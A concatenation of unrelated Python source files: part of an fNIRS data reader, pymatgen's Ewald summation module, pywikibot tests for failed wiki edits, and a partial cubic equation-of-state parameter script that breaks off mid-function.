and index. # Interleave wavelength 1 and 2 to match channel names: this_data = np.zeros((len(wls[0]) * 2, stop - start)) this_data[0::2, :] = wls[0] this_data[1::2, :] = wls[1] data[:] = this_data[idx] return data def _read_csv_rows_cols(fname, start, stop, cols, bounds): with open(fname, 'rb') as fid: fid.seek(bounds[start]) data = fid.read(bounds[stop] - bounds[start]).decode('latin-1') x = np.fromstring(data, float, sep=' ') x.shape = (stop - start, -1) x = x[:, cols] return x
# coding: utf-8 # Copyright (c) Pymatgen Development Team. # Distributed under the terms of the MIT License. from __future__ import division, unicode_literals from math import pi, sqrt, log from datetime import datetime from copy import deepcopy, copy from warnings import warn import bisect import numpy as np from scipy.special import erfc, comb import scipy.constants as constants """ This module provides classes for calculating the ewald sum of a structure. """ __author__ = "Shyue Ping Ong, William Davidson Richard" __copyright__ = "Copyright 2011, The Materials Project" __credits__ = "Christopher Fischer" __version__ = "1.0" __maintainer__ = "Shyue Ping Ong" __email__ = "shyuep@gmail.com" __status__ = "Production" __date__ = "Aug 1 2012" class EwaldSummation(object): """ Calculates the electrostatic energy of a periodic array of charges using the Ewald technique. Ref: http://www.ee.duke.edu/~ayt/ewaldpaper/ewaldpaper.html This matrix can be used to do fast calculations of ewald sums after species removal. E = E_recip + E_real + E_point Atomic units used in the code, then converted to eV. """ # Converts unit of q*q/r into eV CONV_FACT = 1e10 * constants.e / (4 * pi * constants.epsilon_0) def __init__(self, structure, real_space_cut=None, recip_space_cut=None, eta=None, acc_factor=12.0, w=1 / sqrt(2), compute_forces=False): """ Initializes and calculates the Ewald sum. Default convergence parameters have been specified, but you can override them if you wish. Args: structure (Structure): Input structure that must have proper Specie on all sites, i.e. Element with oxidation state. Use Structure.add_oxidation_state... for example. real_space_cut (float): Real space cutoff radius dictating how many terms are used in the real space sum. Defaults to None, which means determine automagically using the formula given in gulp 3.1 documentation. recip_space_cut (float): Reciprocal space cutoff radius. Defaults to None, which means determine automagically using the formula given in gulp 3.1 documentation. eta (float): The screening parameter. Defaults to None, which means determine automatically. acc_factor (float): No. of significant figures each sum is converged to. w (float): Weight parameter, w, has been included that represents the relative computational expense of calculating a term in real and reciprocal space. Default of 0.7 reproduces result similar to GULP 4.2. This has little effect on the total energy, but may influence speed of computation in large systems. Note that this parameter is used only when the cutoffs are set to None. compute_forces (bool): Whether to compute forces. False by default since it is usually not needed. """ self._s = structure self._charged = abs(structure.charge) > 1e-8 self._vol = structure.volume self._compute_forces = compute_forces self._acc_factor = acc_factor # set screening length self._eta = eta if eta \ else (len(structure) * w / (self._vol ** 2)) ** (1 / 3) * pi self._sqrt_eta = sqrt(self._eta) # acc factor used to automatically determine the optimal real and # reciprocal space cutoff radii self._accf = sqrt(log(10 ** acc_factor)) self._rmax = real_space_cut if real_space_cut \ else self._accf / self._sqrt_eta self._gmax = recip_space_cut if recip_space_cut \ else 2 * self._sqrt_eta * self._accf # The next few lines pre-compute certain quantities and store them. # Ewald summation is rather expensive, and these shortcuts are # necessary to obtain several factors of improvement in speedup. self._oxi_states = [compute_average_oxidation_state(site) for site in structure] self._coords = np.array(self._s.cart_coords) # Now we call the relevant private methods to calculate the reciprocal # and real space terms. (self._recip, recip_forces) = self._calc_recip() (self._real, self._point, real_point_forces) = \ self._calc_real_and_point() if self._compute_forces: self._forces = recip_forces + real_point_forces # Compute the correction for a charged cell self._charged_cell_energy = - EwaldSummation.CONV_FACT / 2 * np.pi / \ structure.volume / self._eta * structure.charge ** 2 def compute_partial_energy(self, removed_indices): """ Gives total ewald energy for certain sites being removed, i.e. zeroed out. """ total_energy_matrix = self.total_energy_matrix.copy() for i in removed_indices: total_energy_matrix[i, :] = 0 total_energy_matrix[:, i] = 0 return sum(sum(total_energy_matrix)) def compute_sub_structure(self, sub_structure, tol=1e-3): """ Gives total ewald energy for an sub structure in the same lattice. The sub_structure must be a subset of the original structure, with possible different charges. Args: substructure (Structure): Substructure to compute Ewald sum for. tol (float): Tolerance for site matching in fractional coordinates. Returns: Ewald sum of substructure. """ total_energy_matrix = self.total_energy_matrix.copy() def find_match(site): for test_site in sub_structure: frac_diff = abs(np.array(site.frac_coords) - np.array(test_site.frac_coords)) % 1 frac_diff = [abs(a) < tol or abs(a) > 1 - tol for a in frac_diff] if all(frac_diff): return test_site return None matches = [] for i, site in enumerate(self._s): matching_site = find_match(site) if matching_site: new_charge = compute_average_oxidation_state(matching_site) old_charge = self._oxi_states[i] scaling_factor = new_charge / old_charge matches.append(matching_site) else: scaling_factor = 0 total_energy_matrix[i, :] *= scaling_factor total_energy_matrix[:, i] *= scaling_factor if len(matches) != len(sub_structure): output = ["Missing sites."] for site in sub_structure: if site not in matches: output.append("unmatched = {}".format(site)) raise ValueError("\n".join(output)) return sum(sum(total_energy_matrix)) @property def reciprocal_space_energy(self): """ The reciprocal space energy. """ return sum(sum(self._recip)) @property def reciprocal_space_energy_matrix(self): """ The reciprocal space energy matrix. Each matrix element (i, j) corresponds to the interaction energy between site i and site j in reciprocal space. """ return self._recip @property def real_space_energy(self): """ The real space space energy. """ return sum(sum(self._real)) @property def real_space_energy_matrix(self): """ The real space energy matrix. Each matrix element (i, j) corresponds to the interaction energy between site i and site j in real space. """ return self._real @property def point_energy(self): """ The point energy. """ return sum(self._point) @property def point_energy_matrix(self): """ The point space matrix. A diagonal matrix with the point terms for each site in the diagonal elements. """ return self._point @property def total_energy(self): """ The total energy. """ return sum(sum(self._recip)) + sum(sum(self._real)) + sum(self._point) + self._charged_cell_energy @property def total_energy_matrix(self): """ The total energy matrix. Each matrix element (i, j) corresponds to the total interaction energy between site i and site j. Note that this does not include the charged-cell energy, which is only important when the simulation cell is not charge balanced. """ totalenergy = self._recip + self._real for i in range(len(self._point)): totalenergy[i, i] += self._point[i] return totalenergy @property def forces(self): """ The forces on each site as a Nx3 matrix. Each row corresponds to a site. """ if not self._compute_forces: raise AttributeError( "Forces are available only if compute_forces is True!") return self._forces def get_site_energy(self, site_index): """Compute the energy for a single site in the structure Args: site_index (int): Index of site ReturnS: (float) - Energy of that site""" if self._charged: warn('Per atom energies for charged structures not supported in EwaldSummation') return np.sum(self._recip[:,site_index]) + np.sum(self._real[:,site_index]) \ + self._point[site_index] def _calc_recip(self): """ Perform the reciprocal space summation. Calculates the quantity E_recip = 1/(2PiV) sum_{G < Gmax} exp(-(G.G/4/eta))/(G.G) S(G)S(-G) where S(G) = sum_{k=1,N} q_k exp(-i G.r_k) S(G)S(-G) = |S(G)|**2 This method is heavily vectorized to utilize numpy's C backend for speed. """ numsites = self._s.num_sites prefactor = 2 * pi / self._vol erecip = np.zeros((numsites, numsites), dtype=np.float) forces = np.zeros((numsites, 3), dtype=np.float) coords = self._coords rcp_latt = self._s.lattice.reciprocal_lattice recip_nn = rcp_latt.get_points_in_sphere([[0, 0, 0]], [0, 0, 0], self._gmax) frac_coords = [fcoords for (fcoords, dist, i) in recip_nn if dist != 0] gs = rcp_latt.get_cartesian_coords(frac_coords) g2s = np.sum(gs ** 2, 1) expvals = np.exp(-g2s / (4 * self._eta)) grs = np.sum(gs[:, None] * coords[None, :], 2) oxistates = np.array(self._oxi_states) # create array where q_2[i,j] is qi * qj qiqj = oxistates[None, :] * oxistates[:, None] # calculate the structure factor sreals = np.sum(oxistates[None, :] * np.cos(grs), 1) simags = np.sum(oxistates[None, :] * np.sin(grs), 1) for g, g2, gr, expval, sreal, simag in zip(gs, g2s, grs, expvals, sreals, simags): # Uses the identity sin(x)+cos(x) = 2**0.5 sin(x + pi/4) m = (gr[None, :] + pi / 4) - gr[:, None] np.sin(m, m) m *= expval / g2 erecip += m if self._compute_forces: pref = 2 * expval / g2 * oxistates factor = prefactor * pref * ( sreal * np.sin(gr) - simag * np.cos(gr)) forces += factor[:, None] * g[None, :] forces *= EwaldSummation.CONV_FACT erecip *= prefactor * EwaldSummation.CONV_FACT * qiqj * 2 ** 0.5 return erecip, forces def _calc_real_and_point(self): """ Determines the self energy -(eta/pi)**(1/2) * sum_{i=1}^{N} q_i**2 """ fcoords = self._s.frac_coords forcepf = 2.0 * self._sqrt_eta / sqrt(pi) coords = self._coords numsites = self._s.num_sites ereal = np.empty((numsites, numsites), dtype=np.float) forces = np.zeros((numsites, 3), dtype=np.float) qs = np.array(self._oxi_states) epoint = - qs ** 2 * sqrt(self._eta / pi) for i in range(numsites): nfcoords, rij, js = self._s.lattice.get_points_in_sphere(fcoords, coords[i], self._rmax, zip_results=False) # remove the rii term inds = rij > 1e-8 js = js[inds] rij = rij[inds] nfcoords = nfcoords[inds] qi = qs[i] qj = qs[js] erfcval = erfc(self._sqrt_eta * rij) new_ereals = erfcval * qi * qj / rij # insert new_ereals for k in range(numsites): ereal[k, i] = np.sum(new_ereals[js == k]) if self._compute_forces: nccoords = self._s.lattice.get_cartesian_coords(nfcoords) fijpf = qj / rij ** 3 * (erfcval + forcepf * rij * np.exp(-self._eta * rij ** 2)) forces[i] += np.sum(np.expand_dims(fijpf, 1) * (np.array([coords[i]]) - nccoords) * qi * EwaldSummation.CONV_FACT, axis=0) ereal *= 0.5 * EwaldSummation.CONV_FACT epoint *= EwaldSummation.CONV_FACT return ereal, epoint, forces @property def eta(self): return self._eta def __str__(self): if self._compute_forces: output = ["Real = " + str(self.real_space_energy), "Reciprocal = " + str(self.reciprocal_space_energy), "Point = " + str(self.point_energy), "Total = " + str(self.total_energy), "Forces:\n" + str(self.forces) ] else: output = ["Real = " + str(self.real_space_energy), "Reciprocal = " + str(self.reciprocal_space_energy), "Point = " + str(self.point_energy), "Total = " + str(self.total_energy), "Forces were not computed"] return "\n".join(output) class EwaldMinimizer: """ This class determines the manipulations that will minimize an ewald matrix, given a list of possible manipulations. This class does not perform the manipulations on a structure, but will return the list of manipulations that should be done on one to produce the minimal structure. It returns the manipulations for the n lowest energy orderings. This class should be used to perform fractional species substitution or fractional species removal to produce a new structure. These manipulations create large numbers of candidate structures, and this class can be used to pick out those with the lowest ewald sum. An alternative (possibly more intuitive) interface to this class is the order disordered structure transformation. Author - Will Richards Args: matrix: A matrix of the ewald sum interaction energies. This is stored in the class as a diagonally symmetric array and so self._matrix will not be the same as the input matrix. m_list: list of manipulations. each item is of the form (multiplication fraction, number_of_indices, indices, species) These are sorted such that the first manipulation contains the most permutations. this is actually evaluated last in the recursion since I'm using pop. num_to_return: The minimizer will find the number_returned lowest energy structures. This is likely to return a number of duplicate structures so it may be necessary to overestimate and then remove the duplicates later. (duplicate checking in this process is extremely expensive) """ ALGO_FAST = 0 ALGO_COMPLETE = 1 ALGO_BEST_FIRST = 2 """ ALGO_TIME_LIMIT: Slowly increases the speed (with the cost of decreasing accuracy) as the minimizer runs. Attempts to limit the run time to approximately 30 minutes. """ ALGO_TIME_LIMIT = 3 def __init__(self, matrix, m_list, num_to_return=1, algo=ALGO_FAST): # Setup and checking of inputs self._matrix = copy(matrix) # Make the matrix diagonally symmetric (so matrix[i,:] == matrix[:,j]) for i in range(len(self._matrix)): for j in range(i, len(self._matrix)): value = (self._matrix[i, j] + self._matrix[j, i]) / 2 self._matrix[i, j] = value self._matrix[j, i] = value # sort the m_list based on number of permutations self._m_list = sorted(m_list, key=lambda x: comb(len(x[2]), x[1]), reverse=True) for mlist in self._m_list: if mlist[0] > 1: raise ValueError('multiplication fractions must be <= 1') self._current_minimum = float('inf') self._num_to_return = num_to_return self._algo = algo if algo == EwaldMinimizer.ALGO_COMPLETE: raise NotImplementedError('Complete algo not yet implemented for ' 'EwaldMinimizer') self._output_lists = [] # Tag that the recurse function looks at at each level. If a method # sets this to true it breaks the recursion and stops the search. self._finished = False self._start_time = datetime.utcnow() self.minimize_matrix() self._best_m_list = self._output_lists[0][1] self._minimized_sum = self._output_lists[0][0] def minimize_matrix(self): """ This method finds and returns the permutations that produce the lowest ewald sum calls recursive function to iterate through permutations """ if self._algo == EwaldMinimizer.ALGO_FAST or \ self._algo == EwaldMinimizer.ALGO_BEST_FIRST: return self._recurse(self._matrix, self._m_list, set(range(len(self._matrix)))) def add_m_list(self, matrix_sum, m_list): """ This adds an m_list to the output_lists and updates the current minimum if the list is full. """ if self._output_lists is None: self._output_lists = [[matrix_sum, m_list]] else: bisect.insort(self._output_lists, [matrix_sum, m_list]) if self._algo == EwaldMinimizer.ALGO_BEST_FIRST and \ len(self._output_lists) == self._num_to_return: self._finished = True if len(self._output_lists) > self._num_to_return: self._output_lists.pop() if len(self._output_lists) == self._num_to_return: self._current_minimum = self._output_lists[-1][0] def best_case(self, matrix, m_list, indices_left): """ Computes a best case given a matrix and manipulation list. Args: matrix: the current matrix (with some permutations already performed) m_list: [(multiplication fraction, number_of_indices, indices, species)] describing the manipulation indices: Set of indices which haven't had a permutation performed on them. """ m_indices = [] fraction_list = [] for m in m_list: m_indices.extend(m[2]) fraction_list.extend([m[0]] * m[1]) indices = list(indices_left.intersection(m_indices)) interaction_matrix = matrix[indices, :][:, indices] fractions = np.zeros(len(interaction_matrix)) + 1 fractions[:len(fraction_list)] = fraction_list fractions = np.sort(fractions) # Sum associated with each index (disregarding interactions between # indices) sums = 2 * np.sum(matrix[indices], axis=1) sums = np.sort(sums) # Interaction corrections. Can be reduced to (1-x)(1-y) for x,y in # fractions each element in a column gets multiplied by (1-x), and then # the sum of the columns gets multiplied by (1-y) since fractions are # less than 1, there is no effect of one choice on the other step1 = np.sort(interaction_matrix) * (1 - fractions) step2 = np.sort(np.sum(step1, axis=1)) step3 = step2 * (1 - fractions) interaction_correction = np.sum(step3) if self._algo == self.ALGO_TIME_LIMIT: elapsed_time = datetime.utcnow() - self._start_time speedup_parameter = elapsed_time.total_seconds() / 1800 avg_int = np.sum(interaction_matrix, axis=None) avg_frac = np.average(np.outer(1 - fractions, 1 - fractions)) average_correction = avg_int * avg_frac interaction_correction = average_correction * speedup_parameter \ + interaction_correction * (1 - speedup_parameter) best_case = np.sum(matrix) + np.inner(sums[::-1], fractions - 1) \ + interaction_correction return best_case def get_next_index(self, matrix, manipulation, indices_left): """ Returns an index that should have the most negative effect on the matrix sum """ f = manipulation[0] indices = list(indices_left.intersection(manipulation[2])) sums = np.sum(matrix[indices], axis=1) if f < 1: next_index = indices[sums.argmax(axis=0)] else: next_index = indices[sums.argmin(axis=0)] return next_index def _recurse(self, matrix, m_list, indices, output_m_list=[]): """ This method recursively finds the minimal permutations using a binary tree search strategy. Args: matrix: The current matrix (with some permutations already performed). m_list: The list of permutations still to be performed indices: Set of indices which haven't had a permutation performed on them. """ # check to see if we've found all the solutions that we need if self._finished: return # if we're done with the current manipulation, pop it off. while m_list[-1][1] == 0: m_list = copy(m_list) m_list.pop() # if there are no more manipulations left to do check the value if not m_list: matrix_sum = np.sum(matrix) if matrix_sum < self._current_minimum: self.add_m_list(matrix_sum, output_m_list) return # if we wont have enough indices left, return if m_list[-1][1] > len(indices.intersection(m_list[-1][2])): return if len(m_list) == 1 or m_list[-1][1] > 1: if self.best_case(matrix, m_list, indices) > self._current_minimum: return index = self.get_next_index(matrix, m_list[-1], indices) m_list[-1][2].remove(index) # Make the matrix and new m_list where we do the manipulation to the # index that we just got matrix2 = np.copy(matrix) m_list2 = deepcopy(m_list) output_m_list2 = copy(output_m_list) matrix2[index, :] *= m_list[-1][0] matrix2[:, index] *= m_list[-1][0] output_m_list2.append([index, m_list[-1][3]]) indices2 = copy(indices) indices2.remove(index) m_list2[-1][1] -= 1 # recurse through both the modified and unmodified matrices self._recurse(matrix2, m_list2, indices2, output_m_list2) self._recurse(matrix, m_list, indices, output_m_list) @property def best_m_list(self): return self._best_m_list @property def minimized_sum(self): return self._minimized_sum @property def output_lists(self): return self._output_lists def compute_average_oxidation_state(site): """ Calculates the average oxidation state of a site Args: site: Site to compute average oxidation state Returns: Average oxidation state of site. """ try: avg_oxi = sum([sp.oxi_state * occu for sp, occu in site.species_and_occu.items() if sp is not None]) return avg_oxi except AttributeError: pass try: return site.charge except AttributeError: raise ValueError("Ewald summation can only be performed on structures " "that are either oxidation state decorated or have " "site charges.")
# -*- coding: utf-8 -*- """ Tests for edit failures. These tests should never write to the wiki, unless something has broken badly. These tests use special code 'write = -1' for edit failures. """ # # (C) Pywikibot team, 2014-2019 # # Distributed under the terms of the MIT license. # from __future__ import absolute_import, division, unicode_literals import pywikibot from pywikibot import ( config, Error, NoPage, LockedPage, SpamfilterError, TitleblacklistError, OtherPageSaveError, NoCreateError, PageCreatedConflict, ) from tests import patch from tests.aspects import unittest, TestCase, WikibaseTestCase class TestSaveFailure(TestCase): """Test cases for edits which should fail to save.""" user = True write = -1 family = 'wikipedia' code = 'test' def test_protected(self): """Test that protected titles raise the appropriate exception.""" if self.site.has_group('sysop'): self.skipTest( 'Testing failure of edit protected with a sysop account') page = pywikibot.Page(self.site, 'Wikipedia:Create a new page') self.assertRaises(LockedPage, page.save) def test_spam(self): """Test that spam in content raise the appropriate exception.""" page = pywikibot.Page(self.site, 'Wikipedia:Sandbox') page.text = 'http://badsite.com' try: self.assertRaisesRegex(SpamfilterError, 'badsite.com', page.save) except OtherPageSaveError as e: self.skipTest(e) def test_titleblacklist(self): """Test that title blacklist raise the appropriate exception.""" page = pywikibot.Page(self.site, 'User:UpsandDowns1234/Blacklisttest') self.assertRaises(TitleblacklistError, page.save) def test_nobots(self): """Test that {{nobots}} raise the appropriate exception.""" page = pywikibot.Page(self.site, 'User:John Vandenberg/nobots') with patch.object(config, 'ignore_bot_templates', False): self.assertRaisesRegex(OtherPageSaveError, 'nobots', page.save) def test_touch(self): """Test that Page.touch() does not do a real edit.""" page = pywikibot.Page(self.site, 'User:Xqt/sandbox') old_text = page.text page.text += '\n*Add a new line to page' page.touch() new_text = page.get(force=True) self.assertEqual(old_text, new_text) def test_createonly(self): """Test that Page.save with createonly fails if page exists.""" page = pywikibot.Page(self.site, 'User:Xqt/sandbox') self.assertRaises(PageCreatedConflict, page.save, createonly=True) def test_nocreate(self): """Test that Page.save with nocreate fails if page does not exist.""" page = pywikibot.Page(self.site, 'User:John_Vandenberg/no_recreate') self.assertRaises(NoCreateError, page.save, nocreate=True) def test_no_recreate(self): """Test that Page.save with recreate disabled fails if page existed.""" page = pywikibot.Page(self.site, 'User:John_Vandenberg/no_recreate') self.assertRaisesRegex(OtherPageSaveError, "Page .* doesn't exist", page.save, recreate=False) class TestActionFailure(TestCase): """Test cases for actions which should fail to save.""" user = True write = -1 family = 'wikipedia' code = 'test' def test_movepage(self): """Test that site.movepage raises the appropriate exceptions.""" mysite = self.get_site() mainpage = self.get_mainpage() if 'move' not in mysite.tokens: self.skipTest( "movepage test requires 'move' token not given to user on {}" .format(self.site)) self.assertRaises(Error, mysite.movepage, mainpage, mainpage.title(), 'test') page_from = self.get_missing_article() if not page_from.exists(): self.assertRaises(NoPage, mysite.movepage, page_from, 'Main Page', 'test') class TestWikibaseSaveTest(WikibaseTestCase): """Test case for WikibasePage.save on Wikidata test site.""" family = 'wikidata' code = 'test' user = True write = -1 def test_itempage_save(self): """Test ItemPage save method inherited from superclass Page.""" repo = self.get_repo() item = pywikibot.ItemPage(repo, 'Q6') self.assertRaises(pywikibot.PageNotSaved, item.save) def _make_WbMonolingualText_claim(self, repo, text, language): """Make a WbMonolingualText and set its value.""" claim = pywikibot.page.Claim(repo, 'P271', datatype='monolingualtext') target = pywikibot.WbMonolingualText(text=text, language=language) claim.setTarget(target) return claim def test_WbMonolingualText_invalid_language(self): """Attempt adding a monolingual text with an invalid language.""" repo = self.get_repo() item = pywikibot.ItemPage(repo, 'Q68') claim = self._make_WbMonolingualText_claim(repo, text='Test this!', language='foo') self.assertRaisesRegex( OtherPageSaveError, r'Edit to page \[\[(wikidata:test:)?Q68]] failed:\n' r'modification-failed: "foo" is not a known language code.', item.addClaim, claim) def test_WbMonolingualText_invalid_text(self): """Attempt adding a monolingual text with invalid non-string text.""" repo = self.get_repo() item = pywikibot.ItemPage(repo, 'Q68') claim = self._make_WbMonolingualText_claim(repo, text=123456, language='en') self.assertRaisesRegex( OtherPageSaveError, r'Edit to page \[\[(wikidata:test:)?Q68]] failed:', item.addClaim, claim) def test_math_invalid_function(self): """Attempt adding invalid latex to a math claim.""" repo = self.get_repo() item = pywikibot.ItemPage(repo, 'Q68') claim = pywikibot.page.Claim(repo, 'P717', datatype='math') claim.setTarget('\foo') self.assertRaisesRegex( OtherPageSaveError, r'Edit to page \[\[(wikidata:test:)?Q68]] failed:\n' r'modification-failed: Malformed input:', item.addClaim, claim) def test_url_malformed_url(self): """Attempt adding a malformed URL to a url claim.""" repo = self.get_repo() item = pywikibot.ItemPage(repo, 'Q68') claim = pywikibot.page.Claim(repo, 'P506', datatype='url') claim.setTarget('Not a URL at all') self.assertRaisesRegex( OtherPageSaveError, r'Edit to page \[\[(wikidata:test:)?Q68]] failed:\n' r'modification-failed: This URL misses a scheme like "https://": ' r'Not a URL at all', item.addClaim, claim) def test_url_invalid_protocol(self): """Attempt adding a URL with an invalid protocol to a url claim.""" repo = self.get_repo() item = pywikibot.ItemPage(repo, 'Q68') claim = pywikibot.page.Claim(repo, 'P506', datatype='url') claim.setTarget('wtf://wikiba.se') self.assertRaisesRegex( OtherPageSaveError, r'Edit to page \[\[(wikidata:test:)?Q68]] failed:\n' r'modification-failed: An URL scheme "wtf" is not supported.', item.addClaim, claim) if __name__ == '__main__': # pragma: no cover try: unittest.main() except SystemExit: pass
import numpy as np # import pandas as pd # import math # import matplotlib as plt # import matplotlib.pyplot as plt # import os from pure_data import Data_parse #from .cubic_parameters_1 import Parameter_eos, getdel1, compressibility_factor_cal, acentric_factor_cal from cubic_parameters_1 import Parameter_eos, getdel1, compressibility_factor_cal, acentric_factor_cal from constans import RGAS, A0, B0, C0, A1, B1, C1, D # ----------------------------------------------------------------------- # ----------------------------------------------------------------------- def initial_data(omega, delta_1, NMODEL, ICALC, Pc, dinputs): Zc, OMa, OMb = compressibility_factor_cal(delta_1) # initial guess for k parameter rk = (A1 * Zc + A0) * omega**2 + (B1 * Zc + B0) * omega + (C1 * Zc + C0) # rk = rk * 1.2 # 1.1 #5.2 #3.2 if ICALC == 'constants_eps' or ICALC == 'parameters_eps' or ICALC == 'rk_param': rk *= 1.5 Tr = 0.7 Pvdat = Pc * 10 ** -(1.0 + omega) elif ICALC == 'density': # 5.2 es otro valor que se puede usar en lugar de 1.5 rk = rk * 1.5 Tr_calculada = dinputs[4] / dinputs[0] Tr = Tr_calculada Pvdat = Pc * 10 ** -((1.0 / Tr - 1.0) * 7 * (1.0 + omega) / 3) return rk, Pvdat, Tr def data_in(ICALC, dinputs): if ICALC == 'constants_eps': # CONSTANTS SPECIFICATION (Tc,Pc,OM,Vceos) Tc, Pc, OM, Vceos = dinputs[0], dinputs[1], dinputs[2], dinputs[3] if ICALC == 'parameters_eps': ac, b, del1, rk = dinputs[0], dinputs[1], dinputs[2], dinputs[3] if ICALC == 'rk_param': # dinputs = np.array([Tc, Pc, OM, dc, zrat, ac, b, d, rk]) Tc, Pc, OM, Vceos, delta_1 = dinputs[0], dinputs[1], dinputs[2], dinputs[3], dinputs[7] if ICALC == 'density': Tc, Pc, omega, Vceos, delta_1 = dinputs[0], dinputs[1], dinputs[2], dinputs[3], dinputs[4] T_especific, RHOLSat_esp = dinputs[5], dinputs[6] # -------------------------------------------------------------------------- def require_ID(func): def wrapper(*arg): return Control_arguments(arg[0], arg[1]) return wrapper # @require_ID def models_eos_cal(NMODEL, ICALC, dinputs): if NMODEL == 'SRK' or NMODEL == 'PR': # CONSTANTS SPECIFICATION READ [Tc, Pc, OM] if ICALC == 'constants_eps': Tc = dinputs[0] Pc = dinputs[1] OM = dinputs[2] if NMODEL == 'SRK': rm = 0.48 + 1.574 * OM - 0.175 * OM**2 del1 = 1.0 elif NMODEL == 'PR': rm = 0.37464 + 1.54226 * OM - 0.26992 * OM ** 2 del1 = 1.0 + np.sqrt(2.0) Zc, OMa, OMb = compressibility_factor_cal(del1) Vceos = (Zc * RGAS * Tc) / Pc ac = OMa * (RGAS * Tc) ** 2 / Pc b = OMb * (RGAS * Tc) / Pc params = [ac, b, rm, del1] # PARAMETERS SPECIFICATION READ [ac, b, rm] if ICALC == 'parameters_eps': ac = dinputs[0] b = dinputs[1] rm = dinputs[2] Tc = (OMb * ac) / (OMa * RGAS * b) Pc = OMb * RGAS * Tc / b Vceos = Zc * RGAS * Tc / Pc if NMODEL == 'SRK': del1 = 1.0 al = -0.175 be = 1.574 ga = 0.48 - rm elif NMODEL == 'PR': del1 = 1.0 + np.sqrt(2.0) al = -0.26992 be = 1.54226 ga = 0.37464 - rm OM = acentric_factor_cal(al, be, ga) constants = [Tc, Pc, OM, Vceos] elif NMODEL == 'RKPR': if ICALC == 'constants_eps': # CONSTANTS SPECIFICATION READ [Tc, Pc, OM, Vceos] Tc = dinputs[0] Pc = dinputs[1] OM = dinputs[2] Vceos = dinputs[3] Zc = Pc * Vceos / (RGAS * Tc) del1ini = D[0] + D[1] * (D[2] - Zc) ** D[3] + D[4] * (D[2] - Zc) ** D[5] print('del1ini = {0}'.format(del1ini)) delta_1 = getdel1(Zc, del1ini)[0] Zc, OMa, OMb = compressibility_factor_cal(delta_1) print('Zc = {0}'.format(Zc)) ac = OMa * (RGAS * Tc) ** 2 / Pc b = OMb * (RGAS * Tc) / Pc # calcular rk rk, Pvdat, Tr = initial_data(OM, delta_1, NMODEL, ICALC, Pc, dinputs) eos_calculation = Parameter_eos() rk_cal = eos_calculation.resolver_rk_cal(rk, delta_1, Pvdat, Pc, Tc, Tr) # rk = 1 params = [ac, b, rk, delta_1] elif ICALC == 'parameters_eps': # PARAMETERS SPECIFICATION READ [ac, b, rk, del1] ac = dinputs[0] b = dinputs[1] del1 = dinputs[2] rk = dinputs[3] Zc, OMa, OMb = compressibility_factor_cal(del1) Tc = OMb * ac / (OMa * RGAS * b) Pc = OMb * RGAS * Tc / b Vceos = Zc * RGAS * Tc / Pc al = A1 * Zc + A0 be = B1 * Zc + B0 ga = C1 * Zc + C0 - rk OM = acentric_factor_cal(al, be, ga) constants = [Tc, Pc, OM, Vceos] elif ICALC == 'rk_param': # CONSTANTS SPECIFICATION and del1 READ [Tc, Pc, OM, del1] Tc = dinputs[0] Pc = dinputs[1] OM = dinputs[2] delta_1 = dinputs[7] rk, Pvdat, Tr = initial_data(OM, delta_1, NMODEL, ICALC, Pc, dinputs) eos_calculation = Parameter_eos() rk_cal = eos_calculation.resolver_rk_cal(rk, delta_1, Pvdat, Pc, Tc, Tr) elif ICALC == 'density': # CONSTANTS SPECIFICATION and (T, RhoLsat) READ [Tc, Pc, OM, del1, T, RHOLsat] # Trho = T / Tc, read initial value of del1 Tc = dinputs[0] Pc = dinputs[1] OM = dinputs[2] delta_1 = dinputs[3] T_especific = dinputs[4] RHOLSat_esp = dinputs[5] rk, Pvdat, Tr = initial_data(OM, delta_1, NMODEL, ICALC, Pc, dinputs) eos_calculation = Parameter_eos() delta_1_parameter = eos_calculation.resolver_delta_1_cal(delta_1, rk, Pvdat, RHOLSat_esp, Pc, Tc, Tr) print('The NMODEL is eos_{0} and method ICALC is {1}'.format(NMODEL, ICALC)) if ICALC == 'constants_eps': print("params = [ac, b, rm, del1]") #ac, b, rm, del1 = params #print("ac = {0} b = {1} rm = {2} del1 = {3}".format(ac, b, rm, del1)) return params elif ICALC == 'parameters_eps': print("constants = [Tc, Pc, OM, Vceos]") print(constants) return constants elif ICALC == 'rk_param': print('The parameter rk_cal is {0}'.format(rk_cal)) return rk_cal elif ICALC == 'density': print('The parameter delta1(rho,T) = {0}'.format(delta_1_parameter)) return delta_1_parameter def print_properties_component(component, properties_component): print ('Component = {0}'.format(component)) print ('Acentric_factor = {0}'.format(properties_component[1]['Omega'])) print ('Critical_Temperature = {0} K'.format(properties_component[1]['Tc'])) print ('Critical_Pressure = {0} Bar'.format(properties_component[1]['Pc'])) print ('Critical_Volume = {0} cm3/mol'.format(properties_component[1]['Vc'])) print ('Compressibility_factor_Z = {0}'.format(properties_component[1]['Zc'])) print ("\n") # ----------------------------------------------------------------------- # ----------------------------------------------------------------------- class ClassName(Data_parse): """docstring for ClassName""" def __init__(self, component, NMODEL, ICALC): self.component = component self.NMODEL = NMODEL self.ICALC = ICALC def properties_component(self): properties_comp = self.selec_component(self.component) return properties_comp # dinputs = np.array([properties_component[1]['Tc'], properties_component[1]['Pc'], # properties_component[1]['Omega'], properties_component[1]['Vc']]) # component_eos = models_eos_cal(NMODEL, ICALC, dinputs) # def print_properties_component(self, component, properties_component): def print_properties_component(self): print('Component = {0}'.format(self.component)) print('Acentric_factor = {0}'.format(self.properties_component()[1]['Omega'])) print('Critical_Temperature = {0} K'.format(self.properties_component()[1]['Tc'])) print('Critical_Pressure = {0} Bar'.format(self.properties_component()[1]['Pc'])) print('Critical_Volume = {0} cm3/mol'.format(self.properties_component()[1]['Vc'])) print('Compressibility_factor_Z = {0}'.format(self.properties_component()[1]['Zc'])) print("\n") def initial_data(self, omega, delta_1, NMODEL, ICALC, Pc, dinputs): Zc, OMa, OMb = compressibility_factor_cal(delta_1) # initial guess for k parameter rk = (A1 * Zc + A0) * omega**2 + (B1 * Zc + B0) * omega + (C1 * Zc + C0) # rk = rk * 1.2 # 1.1 #5.2 #3.2 if ICALC == 'constants_eps' or ICALC == 'parameters_eps' or ICALC == 'rk_param': rk *= 1.5 Tr = 0.7 Pvdat = Pc * 10 ** -(1.0 + omega) elif ICALC == 'density': # 5.2 es otro valor que se puede usar en lugar de 1.5 rk = rk * 1.5 Tr_calculada = dinputs[4] / dinputs[0] Tr = Tr_calculada Pvdat = Pc * 10 ** -((1.0 / Tr - 1.0) * 7 * (1.0 + omega) / 3) return rk, Pvdat, Tr def models_eos_cal(self, NMODEL, ICALC, dinputs): if NMODEL == 'SRK' or NMODEL == 'PR': # CONSTANTS SPECIFICATION READ [Tc, Pc, 